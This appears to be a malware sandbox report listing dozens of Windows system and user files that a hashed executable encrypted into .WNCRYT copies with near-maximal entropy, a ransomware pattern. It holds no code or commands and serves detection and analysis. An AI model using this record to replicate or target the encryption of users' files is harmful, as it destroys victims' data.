Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appssynonyms.txt.WNCRYT entropy: 7.99924368148	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3502d36d-7211-4995-af80-eced47ce4a6c}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.9950145719	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ed67b689-2200-491a-9730-3e54067afbf3}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99435419674	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsconversions.txt.WNCRYT entropy: 7.99987634502	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt.WNCRYT entropy: 7.99369980005	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt.WNCRYT entropy: 7.99966098033	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsglobals.txt.WNCRYT entropy: 7.99582690762	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRYT entropy: 7.99792560574	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt.WNCRYT entropy: 7.99816776617	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99916534176	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99932849162	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRYT entropy: 7.99757358725	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99973204144	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664308473525907.txt.WNCRYT entropy: 7.99819018439	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT entropy: 7.99809195878	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\X98HJ34F\hero-image-desktop-f6720a4145[1].jpg.WNCRYT entropy: 7.99863285725	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.WNCRYT entropy: 7.99986271254	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652260521575.txt.WNCRYT entropy: 7.99831718978	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT entropy: 7.99970856721	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652279466572.txt.WNCRYT entropy: 7.99806948856	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652308544336.txt.WNCRYT entropy: 7.99820232984	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652528024801.txt.WNCRYT entropy: 7.99833031846	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT entropy: 7.99975081271	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652546374009.txt.WNCRYT entropy: 7.99835443015	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652624730194.txt.WNCRYT entropy: 7.99810896784	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652666852676.txt.WNCRYT entropy: 7.99819340017	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT entropy: 7.99968721179	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652950926221.txt.WNCRYT entropy: 7.998096778	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT entropy: 7.99424707138	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409653224421742.txt.WNCRYT entropy: 7.99835021248	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT entropy: 7.99421158657	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409653524527350.txt.WNCRYT entropy: 7.9983155161	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRYT entropy: 7.998892722	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409655232786058.txt.WNCRYT entropy: 7.99849639145	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT entropy: 7.9999890829	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409656564963692.txt.WNCRYT entropy: 7.9986942799	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT entropy: 7.99905146538	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409657271224821.txt.WNCRYT entropy: 7.99838222604	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-GB\WelcomeFax.tif.WNCRYT entropy: 7.99797779092	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409658240427405.txt.WNCRYT entropy: 7.99864950414	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT entropy: 7.99619417161	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409658433494739.txt.WNCRYT entropy: 7.99867381221	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT entropy: 7.99322978499	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409658477995265.txt.WNCRYT entropy: 7.99837000707	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\A3CECAC7-AFEC-4136-AD26-4F02273A588C\operations.db.WNCRYT entropy: 7.99998108014	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409658976474171.txt.WNCRYT entropy: 7.99844015597	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT entropy: 7.9984283317	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409659009848568.txt.WNCRYT entropy: 7.99849179612	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT entropy: 7.99524556573	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409659276420550.txt.WNCRYT entropy: 7.99842334814	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT entropy: 7.99858722131	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409659576386340.txt.WNCRYT entropy: 7.99821974649	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT entropy: 7.99474776341	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409659909628426.txt.WNCRYT entropy: 7.99840959886	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664250150656855.txt.WNCRYT entropy: 7.99829218332	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664250451283842.txt.WNCRYT entropy: 7.99836071172	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{65911048-9234-4059-8bb1-0549c23de5a1}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99487953514	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6c5c99b8-fa5e-49d0-8af3-659a6305e839}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99498738738	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db.WNCRYT entropy: 7.99940477277	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9a386491-5394-47a0-a408-e4e3a9d60139}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99476570241	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000b.db.WNCRYT entropy: 7.99937129193	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\appsconversions.txt.WNCRYT entropy: 7.99987483157	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000d.db.WNCRYT entropy: 7.99929431799	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\appsglobals.txt.WNCRYT entropy: 7.99943924255	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\appssynonyms.txt.WNCRYT entropy: 7.9991871944	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\settingsconversions.txt.WNCRYT entropy: 7.99968463497	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\settingsglobals.txt.WNCRYT entropy: 7.99575206976	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\settingssynonyms.txt.WNCRYT entropy: 7.99842498605	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99975382433	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{2ce60361-e872-41fb-bae7-eec2f580d4fb}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99916748562	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-5F2FFB7A31DBA078D8F948F77F0FE9B82BEB1559.bin.DB.WNCRYT entropy: 7.99989098923	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{400a70c4-3e12-4cbe-805a-2dc7c298a033}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99917551213	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\A3CECAC7-AFEC-4136-AD26-4F02273A588C\en-us.16\stream.x86.en-us.db.WNCRYT entropy: 7.99961361071	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664308186704568.txt.WNCRYT entropy: 7.99829356619	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\A3CECAC7-AFEC-4136-AD26-4F02273A588C\x-none.16\stream.x86.x-none.db.WNCRYT entropy: 7.99988990958	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4d14c23e-7ce9-42c1-9a52-20871828d127}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99473133309	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRYT entropy: 7.99648452498	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99218208093	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.99147539543	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.99251100793	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT entropy: 7.99208243344	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99983875127	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99993492544	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99991638778	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.99981579622	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.99709550597	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99983727754	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99981878675	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99984736699	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.99980519855	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99996027372	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99647746104	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99982635424	Jump to dropped file
